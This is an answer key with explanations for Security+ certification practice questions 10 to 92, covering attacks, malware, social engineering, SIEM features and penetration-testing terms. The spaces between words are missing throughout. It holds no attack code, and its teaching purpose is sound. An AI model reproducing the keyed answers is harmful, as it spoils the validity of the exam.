10. B. Asegmentationfaultwilltypicallystoptheprogramfromrunning.ThistypeofissueiswhyaNULLpointerorotherpointerde-referencingerrorisconsideredapotentialsecurityissue,asadenial-of-serviceconditionimpactstheavailabilityoftheservice.Thistypeoferrorisunlikelytocauseadatabreachorallowprivilegeescalation,andpermissionscreepoccursasindividualsaccruemorepermissionsovertimeinasingleorganizationastheirpermissionsarenotcleanedupwhentheyswitchpositionsorroles.

11. C. Themachinesinhernetworkarebeingusedasbots,andtheusersarenotawarethattheyarepartofadistributeddenial-of-service(DDoS)attack.Socialengineeringiswhensomeonetriestomanipulateyouintogivinginformation.Techniquesinvolvedinsocialengineeringattacksincludeconsensus,scarcity,andfamiliarity.Thereisaslightchancethatallcomputerscouldhaveabackdoor,butthatisveryunlikely,andattackersnormallydon’tmanuallylogintoeachmachinetodoaDDoS—itwouldbeautomated,asthroughabot.


12. C. Therearemanyindicatorsofcompromise(IoCs),includingunusualoutboundnetworktraffic,geographicalirregularitieslikeloginsfromacountrywherethepersonnormallydoesnotwork,orincreasesindatabasereadvolumesbeyondnormaltrafficpatterns.Predictiveanalysisisanalysisworkdoneusingdatasetstoattempttodeterminetrendsandlikelyattackvectorssothatanalystscanfocustheireffortswheretheywillbemostneededandeffective.OSINTisopensourceintelligence,andthreatmapsareoftenreal-timeornearreal-timevisualizationsofwherethreatsarecomingfromandwheretheyareheadedto.

Usethefollowingscenarioforquestions13–15.

Chrishasrecentlydeployedasecurityinformationandeventmanagement(SIEM)deviceandwantstouseiteffectivelyinhisorganization.HeknowsthatSIEMsystemshaveabroadrangeofcapabilitiesandwantstousethefeaturestosolveproblemsthatheknowshisorganizationfaces.Ineachofthefollowingquestions,identifythemostappropriateSIEMcapabilityortechniquetoaccomplishwhatChrisneedstodoforhisorganization.

13. B. WhentroubleshootingTCPhandshakes,themostvaluabletoolinmanycasesispacketcapture.IfChrisseesaseriesofSYNpacketswithoutthehandshakebeingcompleted,hecanbereasonablysurethefirewallisblockingtraffic.Reviewingreportsorlogsmaybeusefulforthisaswellbutwon’tshowtheTCPhandshakeissuementionedintheproblem,andsentimentanalysisisfocusedonhowindividualsandgroupsareresponding,notonatechnicalproblem.

14. D. Userbehavioranalysisisakeycapabilitywhenattemptingtodetectpotentialinsiderthreats.ChriscanusehisSIEM’sbehavioralanalysiscapabilitiestodetectimproperorillicituseofrightsandprivilegesaswellasabnormalbehavioronthepartofhisusers.Sentimentanalysishelpsanalyzefeelings,andlogaggregationandsecuritymonitoringprovidewaystogaininsightintotheoverallsecuritypostureandstatusoftheorganization.

15. A. Usinglogaggregationtopulltogetherlogsfrommultiplesources,andperformingcollectionandinitialanalysisonlogcollectorscanhelpcentralizeandhandlelargelogvolumes.Capturingpacketsisusefulfornetworktrafficanalysistoidentifyissuesorsecurityconcerns.Securitymonitoringisanoverallfunctionforsecurityinformationandeventmanagement(SIEM)anddoesn’tspecificallyhelpwiththisneed.Both


sentimentanalysisanduserbehavioranalysisareaimedatusersandgroupsratherthanathowdataiscollectedandmanaged.

16. B. Whiteteamsactasjudgesandobserversduringcybersecurityexercises.Blueteamsactasdefenders,redteamsactasattackers,andpurpleteamsarecomposedofbothblueandredteammemberstocombineattackanddefenseknowledgetoimproveorganizationalsecurity.

17. A. ThesimplestwaytoensurethatAPIsareonlyusedbylegitimateusersistorequiretheuseofauthentication.APIkeysareoneofthemostfrequentlyusedmethodsforthis.IfanAPIkeyislostorstolen,thekeycanbeinvalidatedandreissued,andsinceAPIkeyscanbematchedtousage,Cynthia’scompanycanalsobillcustomersbasedontheirusagepatternsiftheywantto.AfirewallorIPrestrictionsmaybeabletohelp,buttheycanbefragile;customerIPaddressesmaychange.Anintrusionpreventionsystem(IPS)candetectandpreventattacks,butlegitimateusagewouldbehardtotellfromthosewhoarenotcustomersusinganIPS.

18. B. Bufferoverflowattackscrammoredataintoafieldorbufferthantheycanaccept,overflowingintoothermemorylocationsandeithercrashingthesystemorapplication,orpotentiallyallowingcodetobeinsertedintoexecutablelocations.BluesnarfingandbluejackingarebothBluetoothattacks.Cross-sitescriptingattacksallowattackerstoinjectscriptsintopagesviewedbyotherusers.

19. A. AttackersareattemptingtoinfluenceGurvinderwithacombinationofscarcityandurgency.Thus,forthisquestionyoushouldanswerscarcitysinceurgencyisnotlisted.Inmanysocialengineeringprinciplequestions,morethanoneoftheprinciplesmaybeinplay,andyouwillneedtoanswerwiththeprinciplethatiscorrectormorecorrectforthequestion.Inthiscase,thereisnointimidationorclaimtoauthority,andconsensuswouldrequiresomeformofvalidationfromothers.

20. A. Vulnerabilityscansuseautomatedtoolstolookforknownvulnerabilitiesinsystemsandapplicationsandthenprovidereportstoassistinremediationactivities.Penetrationtestsseektoactuallyexploitthevulnerabilitiesandbreakintosystems.Securityauditsusuallyfocusoncheckingpolicies,incidentreports,andotherdocuments.Securitytestisagenerictermforanysortoftest.

21. C. Usernamecomplexityhasnoimpactincredentialharvesting.Multifactorauthenticationcanhelppreventsuccessfulcredentialharvesting


byensuringthatevencaptureofusernameandpasswordisnotenoughtocompromisetheaccount.Awarenesstraininghelpstoreducethelikelihoodofcredentialexposure,andlimitingorpreventinguseofthird-partywebscriptsmakeswebsiteslesslikelytohavecredentialsstolenthroughtheuseofthosescripts,plug-ins,ormodules.

22. C. GregcanclonealegitimateMediaAccessControl(MAC)addressifhecanidentifyoneonthenetwork.ThiscanbeaseasyascheckingforaMAClabelonsomedevicesorbycapturingtrafficonthenetworkifhecanphysicallyaccessit.

23. A. Fromthedescriptionitappearsthattheyarenotconnectingtotherealwebserverbutratherafakeserver.Thatindicatestyposquatting:haveaURLthatisnamedverysimilarlytoarealsitesothatwhenusersmistypetherealsite’sURLtheywillgotothefakesite.

OptionsB,C,andDareallincorrect.Theseareallmethodsofattackingawebsite,butinthiscase,theactualwebsitewasnotattacked.Instead,someusersarevisitingafakesite.

24. C. Domainhijacking,ordomaintheft,occurswhentheregistrationorotherinformationforthedomainischangedwithouttheoriginalregistrant’spermission.Thismayoccurbecauseofacompromisedaccountorduetoabreachofthedomainregistrar’ssecurity.Acommonissueisalapseddomainbeingpurchasedbyathirdparty,andthiscanlooklikeahijackeddomain,butitisalegitimateoccurrenceifthedomainisnotrenewed!DNShijackinginsertsfalseinformationintoaDNSserver,on-path(man-in-the-middle)attackscaptureormodifytrafficbycausingthetraffictopassthroughacompromisedmidpoint,andzero-dayattacksareattacksthatuseanunknownuntilusedvulnerability.

25. D. Thetermforlow-skilledhackersisscriptkiddie.Scriptkiddiestypicallyuseprebuilttoolsanddonothavetheexpertisetomakeormodifytheirowntools.Nothingindicatesthisisbeingdoneforideologicalreasons,andthusthatahacktivistisinvolved.Although“Amateur”maybeanappropriatedescription,thecorrecttermisscriptkiddie.Finally,nothinginthisscenarioindicatesaninsiderthreat.

26. B. Phishingisintendedtoacquiredata,mostoftencredentialsorotherinformationthatwillbeusefultotheattacker.Spamisabroadertermforunwantedemail,althoughthetermisoftengenerallyusedtodescribeunwantedcommunications.Spearphishingtargetsspecificindividuals,


whereaswhalingtargetsimportantpeopleinanorganization.SmishingissentviaSMS(textmessage).Malwarecanbesentinanyoftheseinstances,butthereisnotaspecificrelatedtermthatmeans“spamwithmalwareinit.”

27. B. Acollectionofcomputersthatarecompromised,thencentrallycontrolledtoperformactionslikedenial-of-serviceattacks,datacollection,andothermaliciousactivitiesiscalledabotnet.Zombienets,Nullnets,andAttacknetsarenotcommonlyusedtermstodescribebotnets.

28. B. Systemsandsoftwarethatnolongerhavevendorsupportcanbeasignificantsecurityrisk,andensuringthatavendorwillcontinuetoexistandprovidesupportisanimportantpartofmanyprocurementprocesses.Selah’squestionsareintendedtoassessthelongevityandviabilityofthecompanyandwhetherbuyingfromthemwillresultinherorganizationhavingausableproductforthelongterm.

29. B. Passivereconnaissanceisanyreconnaissancethatisdonewithoutactuallyconnectingtothetarget.Inthiscase,JohnisconductingaformofOSINT,oropensourceintelligence,byusingcommonlyavailablethird-partyinformationsourcestogatherinformationabouthistarget.Activereconnaissanceinvolvescommunicatingwiththetargetnetwork,suchasdoingaportscan.Theinitialexploitationisnotinformationgathering;itisactuallybreakingintothetargetnetwork.Apivotiswhenyouhavebreachedonesystemandusethattomovetoanothersystem.

30. A. Server-siderequestforgery(SSRF)attemptstypicallyattempttogetHTTPdatapassedthroughandwillnotincludeSQLinjection.Blockingsensitivehostnames,IPaddresses,andURLsareallvalidwaystopreventSSRF,asistheuseofwhitelist-basedinputfilters.

31. A. DomainNameSystem(DNS)poisoningattacksattempttoinsertincorrectormaliciousentriesintoatrustedDNSserver.AddressResolutionProtocol(ARP)poisoninginvolvesalteringtheMAC-IPtablesinaswitch.Althoughcross-sitescripting(XSS)andcross-siterequestforgery(CSRForXSRF)arebothtypesofattacks,neitherisapoisoningattack.

32. C. Anunknownenvironmenttestisalsocalledblack-boxorazero-knowledgetestbecauseitdoesnotprovideinformationbeyondthebasicinformationneededtoidentifythetarget.Aknownenvironment,orwhite-boxtest,involvesverycompleteinformationbeinggiventothetester.Thisscenarioisprobablydonefromoutsidethenetwork,butexternaltestisnot


thecorrectterminology.Threattestisnotatermusedinpenetrationtesting.

33. D. Apivotoccurswhenyouexploitonemachineandusethatasabasistoattackothersystems.Pivotingcanbedonefrominternalorexternaltests.White-andblack-boxtestingdescribestheamountofinformationthetesterisgiveninadvance,nothowthetesterperformsthetest.

34. A. Shimmingiswhentheattackerplacessomemalwarebetweenanapplicationandsomeotherfileandinterceptsthecommunicationtothatfile(usuallytoalibraryorsystemAPI).Inmanycases,thisisdonewithadriverforahardwarecomponent.ATrojanhorsemightbeusedtogettheshimontothesystem,butthatisnotdescribedinthisscenario.Abackdoorisameanstocircumventsystemauthorizationandgetdirectaccesstothesystem.Refactoringistheprocessofchangingnamesofvariables,functions,andsoforthinaprogram.

35. C. SOARisarelativelynewcategoryasdefinedbyGartner.Securityorchestration,automation,andresponseincludesthreatandvulnerabilitymanagement,securityincidentresponse,andsecurityoperationsautomation,butnotautomatedmalwareanalysis.

36. C. DomainreputationserviceslikeReputationAuthority,Cisco’sTalos,McAfee’strustedsource.org,andBarracuda’sbarracudacentral.orgsitesallprovidedomainreputationdatathatallowyoutolookupadomainorIPaddresstodetermineifitiscurrentlyblacklistedorhasapoorreputation.

37. B. Hismachinesarepartofadistributeddenial-of-service(DDoS)attack.ThisscenariodescribesagenericDDoS,notaspecificonelikeSYNflood,whichwouldinvolvemanySYNpacketsbeingsentwithoutafullthree-wayTCPhandshake.Thesemachinescouldbepartofabotnetortheymayjusthaveatriggerthatcausesthemtolaunchtheattackataspecifictime.TherealkeyinthisscenarioistheDDoSattack.Finally,abackdoorgivesanattackeraccesstothetargetsystem.

38. B. SinceopenWi-Fihotspotsdonothaveawaytoprovetheyarelegitimate,theycanbeeasilyspoofed.AttackerscanstandupafakeversionofthehotspotandthenconductanSSLstrippingattackbyinsertingthemselvesintosessionsthatvictimsattempttoopentosecureservers.

39. B. ATrojanhorseattachesamaliciousprogramtoalegitimateprogram.Whentheuserdownloadsandinstallsthelegitimateprogram,theygetthemalware.Alogicbombismalwarethatdoesitsmisdeedswhensome


http://trustedsource.org

http://barracudacentral.org

conditionismet.Arootkitismalwarethatgetsadministrative,orroot,access.Amacrovirusisavirusthatisembeddedinadocumentasamacro.

40. D. Whalingistargetingaspecificindividualwhoisimportantintheorganizationlikethepresidentorchieffinancialofficer(CFO).Spearphishingtargetsspecificindividualsorgroups,butwhalingismorespecificintermsoftheimportanceoftheindividualsinvolved.Targetedphishingisnotatermusedintheindustry.Phishingisthegenerictermforawiderangeofrelatedattacks,andyoushouldchoosethemostaccurateanswerforquestionslikethis.

41. D. Criminalsyndicatesmayproduce,sell,andsupportmalwaretools,ormaydeploythemthemselves.Cryptomalwareandotherpackagesareexamplesoftoolsoftencreatedandusedbycriminalsyndicates.Stateactorsaremorelikelytobeassociatedwithadvancedpersistentthreats(APTs)aimedataccomplishinggoalsofthenation-statethatsupportsthem.Hacktiviststypicallyhavepoliticalmotivations,whereasscriptkiddiesmaysimplybeinitforrecognitionorfun.

42. A. Arainbowtableisatableofprecomputedhashes,usedtoretrievepasswords.Abackdoorisusedtogainaccesstoasystem,nottorecoverpasswords.Socialengineeringanddictionaryattackscanbothbeusedtogainaccesstopasswords,buttheyarenottablesofprecomputedhashes.

43. B. Themostcommonconcernthatwillarisewhenavendornolongersupportsadeviceisalackofupdatesorpatches.Thisisparticularlyconcerningwhenthedevicesareoperationaltechnologysuchasutility,lighting,orotherinfrastructurecontroldevicesthathaveaverylonglifecycleandcontrolimportantprocessesorsystems.Althoughimproperdatastorage,lackofdocumentation,andconfigurationissuescanallbeissues,lackofupdatesandpatchingremainsthebiggestandmostfrequentissue.

44. A. BluejackinginvolvessendingunsolicitedmessagestoBluetoothdeviceswhentheyareinrange.BluesnarfinginvolvesgettingdatafromtheBluetoothdevice.Aneviltwinattackusesarogueaccesspointwhosenameissimilaroridenticaltothatofalegitimateaccesspoint.

45. A. SinceDennisisabletoviewthewebtrafficbeforeitissenttotheactualserver,heshouldbeabletoconductaplain-textpasswordattackbyinterceptingthepassword.Pass-the-hashattacksaretypicallyusedinsideWindowsenvironments,SQLinjectionwouldattacktheserver,andcross-sitescriptingispossiblebutnotaslikelyastheplain-textpasswordattack


inthisscenario.

46. A. Dumpsterdivingisthetermforrummagingthroughthewaste/trashtorecoverusefuldocumentsormaterials.Penetrationtestersandattackersmaydumpster-diveaspartoftheirefforts.Infact,emptyingtrashcansinalocationcanprovideusefulinformationevenwithoutjumpingintoadumpster!Trashdivingandtrashengineeringarenotthetermsusedintheindustry.Nothinginthisscenariodescribessocialengineering.

47. A. Thisisaremote-accessTrojan(RAT),malwarethatopensaccessforsomeonetoremotelyaccessthesystem.Awormwouldhavespreaditselfviaavulnerability,whereasalogicbombrunswhensomelogicalconditionismet.Finally,arootkitprovidesrootoradministrativeaccesstothesystem.

48. B. Zero-dayexploitsarenew,andtheyarenotinthevirusdefinitionsfortheantivirus(AV)programs.Thismakesthemdifficulttodetect,exceptbytheirbehavior.RATs,worms,androotkitsaremorelikelytobedetectedbyAVprograms.

49. D. Radiofrequencyidentifier(RFID)attackstypicallyfocusondatacapture,spoofingRFIDdata,orconductingadenial-of-serviceattack.Birthdayattacksareusedagainstcryptosystems,whichmaybepartofanRFIDtagenvironment,buttheyaren’tacommonattackagainstRFIDsystems.

50. C. Initializationvectorsareusedwithstreamciphers.AnIVattackattemptstoexploitaflawtousetheIVtoexposeencrypteddata.Nothinginthisscenariorequiresordescribesarogueaccesspoint/eviltwin.Wi-FiProtectedSetup(WPS)usesaPINtoconnecttothewirelessaccesspoint(WAP).TheWPSattackattemptstointerceptthatPINintransmission,connecttotheWAP,andthenstealtheWPA2password.

51. C. Thisdescriptiondoesnotincludeanyrisktoavailabilitysincethereisnoinformationaboutsystemsorservicesbeingdownoroffline.Thisscenariowouldlikelyresultinreputational,financial,anddatalossimpactsforScott’scompany.

52. B. Cross-siterequestforgery(XSRForCSRF)sendsfakerequeststoawebsitethatpurporttobefromatrusted,authenticateduser.Cross-sitescripting(XSS)exploitsthetrusttheuserhasforthewebsiteandembedsscriptsintothatwebsite.BluejackingisaBluetoothattack.Nothinginthisscenariorequiresordescribesaneviltwin,whichisanattackthatusesa


maliciousaccesspointthatduplicatesalegitimateAP.

53. A. Cyberintelligencefusionistheprocessofgathering,analyzing,andthendistributinginformationbetweendisparateagenciesandorganizations.FusioncenterslikethoseoperatedbytheU.S.DepartmentofHomelandSecurity(DHS)focusonstrengtheningsharedintelligenceactivities.Theyarenotspecificallytaskedwithbuildingtoolsbycombiningothertools,althoughtheymayinsomecases.Theyarenotpowerplants,andtheyarefocusedongatheringandsharinginformation,notbuildingaclassificationstructure.

54. B. TheCommonVulnerabilitiesandExposures(CVE)listhasentriesthatdescribeandprovidereferencestopubliclyknowncybersecurityvulnerabilities.ACVEfeedwillprovideupdatedinformationaboutnewvulnerabilitiesandausefulindexnumbertocrossreferencewithotherservices.

55. B. Abirthdayattackexploitsthebirthdayprobleminprobabilitytheoryandreliesonfindingcollisionsbetweenrandomattackattemptsandthenumberofpotentialpermutationsofasolution.Birthdayattacksareonemethodofattackingcryptographichashfunctions.Theyarenotasocialengineeringattack,anetworkdenial-of-serviceattack,oraTCP/IPprotocolattack.

56. B. Thisanexampleofadisassociationattack.ThedeauthenticationpacketcausesJuanita’ssystemtodisassociate,andtheattackercanthenexecuteasecondattacktargetingherauthenticationcredentialsorotherwirelessdatausinganeviltwinattack.Misconfigurationwon’tcauseauthenticateduserstodeauthenticate.Sessionhijackinginvolvestakingoveranauthenticatedsession.Backdoorsarebuilt-inmethodstocircumventauthentication.

57. A. Dictionaryattacksusealistofwordsthatarebelievedtobelikelypasswords.Arainbowtableisaprecomputedtableofhashes.Bruteforcetrieseverypossiblerandomcombination.Ifanattackerhastheoriginalplaintextandciphertextforamessage,theycandeterminethekeyspaceusedthroughbrute-forceattemptstargetingthekeyspace.Sessionhijackingiswhentheattackertakesoveranauthenticatedsession.

58. B. DowngradeattacksseektomakeaTransportLayerSecurity(TLS)connectionuseaweakercipherversion,thusallowingtheattackertomoreeasilybreaktheencryptionandreadtheprotecteddata.Inadisassociationattack,theattackerattemptstoforcethevictimintodisassociatingfroma


resource.Sessionhijackingiswhentheattackertakesoveranauthenticatedsession.Brute-forceattemptseverypossiblerandomcombinationtogetthepasswordorencryptionkey.

59. D. Acollisioniswhentwodifferentinputsproducethesamehash.Arainbowtableisatableofprecomputedhashes.Bruteforceattemptseverypossiblerandomcombinationtogetthepasswordorencryptionkey.Sessionhijackingiswhentheattackertakesoveranauthenticatedsession.

60. C. Anadvancedpersistentthreat(APT)involvessophisticated(i.e.,advanced)attacksoveraperiodoftime(i.e.,persistent).Adistributeddenial-of-service(DDoS)couldbeapartofanAPT,butinandofitselfisunlikelytobeanAPT.Bruteforceattemptseverypossiblerandomcombinationtogetthepasswordorencryptionkey.Inadisassociationattack,theattackerattemptstoforcethevictimintodisassociatingfromaresource.

61. B. Phishingisnotcommonlyusedtoacquireemailaddresses.Phishingemailstargetpersonalinformationandsensitiveinformationlikepasswordsandcreditcardnumbersinmostcases.

62. A. WhenanIDSorantivirusmistakeslegitimatetrafficforanattack,thisiscalledafalsepositive.AfalsenegativeiswhentheIDSmistakesanattackforlegitimatetraffic.Itistheoppositeofafalsepositive.OptionsCandDarebothincorrect.Althoughthesemaybegrammaticallycorrect,thesearenotthetermsusedintheindustry.Inmilitaryoperations,falseflagoperationsattempttotransferblametoanothercompany,thusa“falseflag.”

63. B. Akeyloggerisasoftwareorhardwaretoolusedtocapturekeystrokes.Keyloggersareoftenusedbyattackerstocapturecredentialsandothersensitiveinformation.Arootkitisusedtoobtainandmaintainadministrativerightsonasystem,andawormisaself-spreadingformofmalwarethatfrequentlytargetsvulnerableservicesonanetworktospread.

64. A. Thetermforattemptingtogainanyprivilegesbeyondwhatyouhaveisprivilegeescalation.Sessionhijackingistakingoveranauthenticatedsession.Rootgrabbingandclimbingarenottermsusedintheindustry.

65. B. MACfloodingattacksattempttooverflowaswitch’sCAMtable,causingtheswitchtosendalltraffictoallportsratherthantotheportthatagivenMACaddressisassociatedwith.Althoughthiswaspossiblewithmanyolderswitches,mostmodernswitchesarelesssusceptibletothistypeofattack,andsomehavesecuritycapabilitiesbuiltintopreventthistypeof


attack.

66. B. SpywareandadwarearebothcommonexamplesPUPs,orpotentiallyunwantedprograms.Thoughnotdirectlymalicious,theycanposeriskstouserprivacyaswellascreateannoyanceslikepopupsorotherunwantedbehaviors.Trojansappeartobelegitimateprogramsorarepairedwiththem,RATsprovideremoteaccessandareasubcategoryofTrojans,andransomwaredemandspaymentorotheractionstoavoiddamagetofilesorreputation.

67. C. Araceconditioncanoccurwhenmultiplethreadsinanapplicationareusingthesamevariableandthesituationisnotproperlyhandled.OptionAisincorrect.Abufferoverflowisattemptingtoputmoredatainabufferthanitisdesignedtohold.OptionBisincorrect.Alogicbombismalwarethatperformsitsmisdeedwhensomelogicalconditionismet.OptionDisincorrect.Asthenamesuggests,impropererrorhandlingisthelackofadequateorappropriateerrorhandlingmechanismswithinsoftware.

68. B. ThemalwareinthisexampleisaTrojanhorse—itpretendstobesomethingdesirable,oratleastinnocuous,andinstallsmalicioussoftwareinadditiontoorinsteadofthedesiredsoftware.Arootkitgivesrootoradministrativeaccess,spywareismalwarethatrecordsuseractivities,andabootsectorvirusisavirusthatinfectsthebootsectoroftheharddrive.

69. B. ThePostgresserverissetupusingaweakpasswordfortheuserpostgres,theadministrativeloginforthedatabase.Thisisaformofunsecuredadministrativeorrootaccount.Interestingly,thisisnotadefaultsetting,sincePostgresusesnopasswordbydefaultforthePostgresaccount—anevenworsesettingthanusingpostgresasthepassword,butnotbymuch!

70. A. Anniehasmovedlaterally.Lateralmovementmovestosystemsatthesametrustlevel.Thiscanprovideaccesstonewdataordifferentviewsofthenetworkdependingonhowthesystemsandsecurityareconfigured.Privilegeescalationinvolvesgainingadditionalprivileges,oftenthoseofanadministrativeuser.Verticalmovementissometimesreferencedwhengainingaccesstosystemsoraccountswithahighersecurityortrustlevel.Privilegeretentionwasmadeupforthisquestion.

71. A. Thisisanexampleofafalsepositive.Afalsepositivecancauseavulnerabilitytoshowthatwasnotactuallythere.Thissometimeshappenswhenapatchorfixisinstalledbuttheapplicationdoesnotchangeinaway


thatshowsthechange,andithasbeenanissuewithupdateswheretheversionnumberistheprimarycheckforavulnerability.Whenavulnerabilityscannerseesavulnerableversionnumberbutapatchhasbeeninstalledthatdoesnotupdateit,afalsepositivereportcanoccur.Afalsenegativewouldreportapatchorfixwheretherewasactuallyavulnerability.Automaticupdateswerenotmentioned,norwasaspecificApacheversion.

72. C. Abufferoverflowispossiblewhenboundariesarenotcheckedandtheattackertriestoputinmoredatathanthevariablecanhold.Cross-sitescripting(XSS)isawebpageattack.Cross-siterequestforgery(CSRF)isawebpageattack.Alogicbombismalwarethatperformsitsmisdeedwhensomeconditionismet.

73. C. Consensus,sometimescalledsocialproof,isasocialengineeringprinciplethatleveragesthefactthatpeopleareoftenwillingtotrustgroupsofotherpeople.Here,theattackershaveplantedfalseinformationthatthesoftwareistrustworthy,thusallowingtargetsto“prove”tothemselvesthattheycansafelyinstallthesoftware.Scarcityusesaperceptionthatsomethingmaynotbeavailableorisuncommonandthusdesirable.Familiaritytakesadvantageofthetrustthatindividualsputintopeopleandorganizationstheyarealreadyfamiliarwith.Trust-basedattacksexploitaperceptionoftrustworthiness.

74. B. Alogicbombperformsmaliciousactionswhenaspecificconditionorconditionsaremet.Abootsectorvirusinfectsthebootsectoroftheharddrive.Abufferoverflowoccurswhentheattackerattemptstoputmoredatainavariablethanitcanhold.Asparseinfectorvirusperformsitsmaliciousactivityintermittentlytomakeithardertodetect.

75. B. Elicitation,ortheprocessofelicitinginformationthroughconversationtogatherusefulinformation,isakeytoolinapenetrationtester’ssocialengineeringarsenal.Pretextinginvolvestheuseofbelievablereasonsforthetargettogoalongwithwhateverthesocialengineeringisattemptingtodo.Impersonationinvolvesactinglikesomeoneyouarenot,whereasintimidationattemptstoscareorthreatenthetargetintodoingwhatthesocialengineerwantsthemto.

76. B. Alloftheseprotocolsareunsecure.FTPhasbeenreplacedbysecureversionsinsomeuses(SFTP/FTPS),whereasTelnethasbeensupersededbySSHinmodernapplications.RSHisoutmodedandshouldbeseenonly


ontrulyancientsystems.Ifyoufindasystemordeviceexposingtheseprotocols,youwillneedtodiginfurthertodeterminewhytheyareexposedandhowtheycanbeprotectediftheymustremainopenforalegitimatereason.

77. B. ThebestwayforScotttodeterminewhereanorganization’swirelessnetworkscanbeaccessedfromistousewardriving,warflying,and/orwarwalkingtechniquestomapoutthewirelesssignalfootprintoftheorganization.OSINTandactivescanswouldbeusefulgatheringinformationabouttheorganizationanditssystems,butnotaboutitswirelessnetworksrangeandaccessibility,andsocialengineeringismorelikelytobeusefulforgatheringinformationorgainingaccesstofacilitiesorsystems.

78. A. Amacrovirusisamaliciousscript(macro)embeddedintoafile,typicallyaMicrosoftOfficefile.TheyaretypicallywritteninVisualBasicforApplications(VBA)script.Abootsectorvirusinfectsthebootsectoroftheharddrive.ATrojanhorseismalwarethatistiedtoalegitimateprogram.Inthisscenario,themalwareisactuallyembeddedinanOfficedocument.Thetwoaresimilar,butnotthesame.AremoteaccessTrojan(RAT)isaTrojanhorsethatgivestheattackerremoteaccesstothemachine.

79. C. Bygivingthetesterlogins,youareallowingthemtoconductacredentialedscan(i.e.,ascanwithanaccountoraccountsthatallowthemaccesstochecksettingsandconfigurations).Knownenvironmentandpartiallyknownenvironmenttestsdescribethelevelofknowledgethetesterisgivenofthenetwork.Aprivilegescancannotbeanunknownenvironmenttest,butitcouldbeeitherknownorpartiallyknown.Anintrusivescanisatermusedforscansthatattempttoexerciseorusethevulnerabilitytheyfindinsteadofattemptingtoavoidharm.

80. B. TheSecurity+examexpectspractitionerstobeabletoanalyzescriptsandcodetodetermineroughlywhatfunctiontheyperformandtobeabletoidentifymultipleprogramminglanguages.Pythonreliesonformattinglikeindentingtoindicateblocksofcodeanddoesnotuselineendindicatorsasyouwouldfindinsomelanguages.ThiscodeisabasicPythonportscannerthatwillscaneveryportfrom1to9999,checkingtoseeifitallowsaconnection.

81. C. BotnetsareoftenusedtolaunchDDoSattacks,withtheattackcoming


fromallthecomputersinthebotnetsimultaneously.Phishingattacksattempttogettheusertogiveupinformation,clickonalink,oropenanattachment.Adwareconsistsofunwantedpop-upads.ATrojanhorseattachesmalwaretoalegitimateprogram.

82. B. Amandahasdiscoveredaninsiderthreat.Insiderthreatscanbedifficulttodiscover,asamaliciousadministratororotherprivilegeduserwilloftenhavetheabilitytoconcealtheiractionsormayactuallybethepersontaskedwithhuntingforthreatslikethis!Thisisnotazero-day—novulnerabilitywasmentioned,therewasnomisconfigurationsincethiswasanintentionalaction,andencryptionisnotmentionedordiscussed.

83. B. Socialmediainfluencecampaignsseektoachievethegoalsoftheattackerorownerofthecampaign.Theyleveragesocialmediausingbotsandgroupsofposterstosupporttheideas,concepts,orbeliefsthatalignwiththegoalsofthecampaign.Impersonationisatypeofsocialengineeringattackwheretheattackerpretendstobesomeoneelse.Awateringholeattackplacesmalwareormaliciouscodeonasiteorsitesthatarefrequentlyvisitedbyatargetedgroup.Asymmetricwarfareiswarfarebetweengroupswithsignificantlydifferentpowerorcapabilities.

84. C. Usingdefaultsettingsisaformofweakconfiguration.Manyvulnerabilityscannersandattacktoolshavedefaultsettingsbuilt-intotestwith,anddefaultsettingsareeasilyobtainedformostdeviceswithaquicksearchoftheInternet.Configuringtheaccountsisnottheissue;changingdefaultpasswordsandsettingsis.Althoughtrainingusersisimportant,that’snottheissueinthisscenario.Patchingsystemsisimportant,butthatwon’tchangedefaultsettings.

85. D. InaDLLinjection,themalwareattemptstoinjectcodeintotheprocessofsomelibrary.Thisisaratheradvancedattack.OptionAisincorrect.Alogicbombexecutesitsmisdeedwhensomeconditionismet.OptionBisincorrect.Sessionhijackingistakingoveranauthenticatedsession.OptionCisincorrect.Bufferoverflowsaredonebysendingmoredatatoavariablethanitcanhold.

86. B. Stateactors(ornation-stateactors)oftenhavegreaterresourcesandskills,makingthemamoresignificantthreatandfarmorelikelytobeassociatedwithanadvancedpersistentthreatactor.Scriptkiddies,hacktivists,andinsiderthreatstendtobelesscapableandareallfarlesslikelytobeassociatedwithanAPT.


87. C. Anintrusivescanattemptstoactivelyexploitvulnerabilities,andthuscouldpossiblycausesomedisruptionofoperations.Forthisreason,itshouldbeconductedoutsidenormalbusinesshoursorinatestenvironment,ifitisusedatall.Anonintrusivescanattemptstoidentifyvulnerabilitieswithoutexploitingthem.Apenetrationtestactuallyattemptstobreachthenetworkbyexploitingvulnerabilities.Anauditisprimarilyadocumentcheck.Bothintrusiveandnonintrusivevulnerabilityscanscanbeeffectiveatfindingvulnerabilities.

88. C. Abackdoorisamethodforbypassingnormalsecurityanddirectlyaccessingthesystem.Alogicbombismalwarethatperformsitsmisdeedswhensomeconditionismet.ATrojanhorsewrapsamaliciousprogramtoalegitimateprogram.Whentheuserdownloadsandinstallsthelegitimateprogram,theygetthemalware.Arootkitismalwarethatgetsrootoradministrativeprivileges.

89. D. Thefactthatthewebsiteisdefacedinamannerrelatedtothecompany’spublicindicatesthattheattackersweremostlikelyengaginginhacktivismtomakeapoliticalorbelief-basedpoint.Scripts,nation-stateactors,andorganizedcrimedon’taccountforthestatementsadversetothecompany’spolicies,whichiswhyhacktivismistherealcause.

90. A. Pharmingattemptstoredirecttrafficintendedforalegitimatesitetoanothermalicioussite.AttackersmostoftendothisbychangingthelocalhostsfileorbyexploitingatrustedDNSserver.

91. B. Passwordsprayingisaspecifictypeofbruteforceattackwhichusesasmallerlistofcommonpasswordsformanyaccountstoattempttologin.Althoughbruteforcingistechnicallycorrect,thebestmatchhereispasswordspraying.Whenyouencounterquestionslikethisonthetest,makesureyouprovidethemostaccurateanswer,ratherthanonethatfitsbutmaynotbethebestanswer.Limitedloginattacksisamade-upanswer,andspinninganaccountreferstochangingthepasswordforanaccount,oftenbecauseofacompromiseortopreventauserfromloggingbackintoitwhilepreservingtheaccount.

92. C. Althoughyoumightsupposethatanation-stateattacker(theusualattackerbehindanadvancedpersistentthreat)wouldattackfromaforeignIPaddress,theyoftenuseacompromisedaddressinthetargetcountryasabaseforattacks.OptionsA,B,andDareallincorrect.Theseareactuallysignsofanadvancedpersistentthreat.


